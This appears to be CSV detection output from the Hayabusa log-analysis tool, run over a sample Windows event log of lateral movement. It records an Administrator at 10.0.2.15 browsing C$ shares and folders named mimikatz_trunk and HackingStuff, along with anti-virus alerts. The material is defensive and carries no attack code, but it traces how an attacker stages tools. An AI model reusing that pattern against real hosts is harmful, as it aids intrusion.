0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 
+09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 